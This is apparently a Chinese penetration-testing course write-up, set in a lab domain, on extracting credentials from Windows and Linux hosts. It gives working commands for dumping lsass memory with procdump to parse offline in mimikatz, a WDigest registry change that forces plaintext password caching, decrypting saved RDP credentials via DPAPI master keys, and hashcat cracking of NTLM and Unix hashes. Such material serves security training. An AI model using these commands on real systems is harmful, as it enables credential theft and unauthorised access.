第138天:内网安全-Win&Linux&内存离线读取&Hashcat 破解&RDP&SSH 存储提取

案例一: 明文获取-Windows-内存读取&离线读取&RDP保存&Hashcat

windows实验背景

微软为了防止明文密码泄露发布了补丁 KB2871997 ,关闭了 Wdigest 功能。当系统为 win10 或 2012R2 以上时,默认在内存缓存中禁止保存明文密码, 此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。

实验环境 god.org

离线读取

mimikatz被拦截(木马程序)

首先先上线win2012运行获取明文密码

获取明文密码都为空,只能获取hash

利用微软官方工具,在本地离线破解密码

https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

https://github.com/gentilkiwi/mimikatz

首先上传procdump程序,或者在本地设置代理运行

这个程序是微软工具,不会被杀,运行下面的命令,然后将生成的文件保存在本地

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp

本地解密文件

mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonPasswords full

不一定能读出来,如果没有利用密码登录过或者没有开启存储

这里如果存储了并且登录过就能获取到明文的账号密码

不存储+禁用mimikatz

win2012以上的主机可能不会存储

通过修改注册表+强制锁屏,等待用户输入账号密码来存储

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

执行命令之前的注册表

执行命令

执行完成以后

锁屏重新登录以后,利用mimikatz抓取密码就可以直接抓取到明文密码了

在此基础上如果mimikatz也被禁用了那么用刚才的方法就可以在本地导出来密码

Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.DMP"
sekurlsa::logonPasswords full

hash破解

虽然不能获得明文密码但是可以获得hash,可以直接利用网站进行破解

破解网站

MD5免费在线解密破解_MD5在线加密-SOMD5

md5解密 MD5在线解密 破解md5

RDP凭据抓取

当使用mstsc连接目标主机时往往为了方便会设置记住凭据按钮

利用win2012登录一次域控

查看连接记录的命令,这里在cs中运行时一定是你用哪个用户连接过,就用哪个用户测试

cmdkey /list

查看本地的Credentials

dir /a %userprofile%\appdata\local\microsoft\credentials\*

Credentials记录guidMasterKey值:

mimikatz dpapi::cred /in:C:\Users\dbadmin\appdata\local\microsoft\credentials\99149C3884E841134091082C3D675F52

这里值要对应上

记录MasterKey

把guidmasterkey对应的masterkey记录下来

3963b39b-eaf5-4817-ad25-a5b65367190c

运行这条命令的时候需要管理员身份

mimikatz sekurlsa::dpapi

找的时候可以复制到记事本,ctrl+f搜索

解密masterkey凭据

mimikatz dpapi::cred /in:C:\Users\dbadmin\appdata\local\microsoft\credentials\Credentials值 /masterkey:masterkey值
mimikatz dpapi::cred /in:C:\Users\dbadmin\appdata\local\microsoft\credentials\99149C3884E841134091082C3D675F52 /masterkey:158efdc88d084af08d307b4071899fd4bfa5f47813ed7885043554c2374d7f5e7b8acfbbb1ad20d8463d32dfa65b48f6979c36d44c3860b39b8501e023c34ce1

hashcat破解

工具下载地址: https://hashcat.net/hashcat/

参考文章: https://www.cnblogs.com/Junglezt/p/16044372.html

windows
hashcat.exe -a 0 -m 1000 hash.txt pass.txt  #-a 后面是爆破方式0代表字典爆破 -m后面是爆破数据的类型1000代表NTLM

爆破结果

使用掩码爆破方式,我的密码是admin!@#45

hashcat.exe -a 3 -m 1000 hash.txt ?l?l?l?l?l?s?s?s?d?d  #代表五个小写字母,三个字符,两个数字

这里本来就是一个很吃设备的应用,我就不运行了,运行了一会声音很大^_^

linux

hashcat也可以破解linux密码

先查看密码

linux sha512crypt 6, SHA512 (Unix)加密方式:

hashcat -m 1800 sha512linux.txt p.txt

linux sha256crypt 5, SHA256 (Unix)加密方式:

hashcat -m 7400 sha256linux.txt p.txt

linux下md5crypt, MD5 (Unix), Cisco-IOS 1 (MD5)加密方式:

hashcat -m 500 linuxmd5.txt p.txt

inux下bcrypt 2\*, Blowfish加密方式:

hashcat -m 3200 linuxmd5.txt p.txt

破解

破解结果

相关推荐
Koi慢热4 分钟前
路由基础(全)
linux·网络·网络协议·安全
传而习乎14 分钟前
Linux:CentOS 7 解压 7zip 压缩的文件
linux·运维·centos
soulteary16 分钟前
突破内存限制:Mac Mini M2 服务器化实践指南
运维·服务器·redis·macos·arm·pika
运维&陈同学2 小时前
【zookeeper01】消息队列与微服务之zookeeper工作原理
运维·分布式·微服务·zookeeper·云原生·架构·消息队列
是阿建吖!2 小时前
【Linux】进程状态
linux·运维
hzyyyyyyyu2 小时前
内网安全隧道搭建-ngrok-frp-nps-sapp
服务器·网络·安全
网络研究院2 小时前
国土安全部发布关键基础设施安全人工智能框架
人工智能·安全·框架·关键基础设施
明明跟你说过2 小时前
Linux中的【tcpdump】:深入介绍与实战使用
linux·运维·测试工具·tcpdump
Daniel 大东3 小时前
BugJson因为json格式问题OOM怎么办
java·安全
Mr_Xuhhh3 小时前
重生之我在学环境变量
linux·运维·服务器·前端·chrome·算法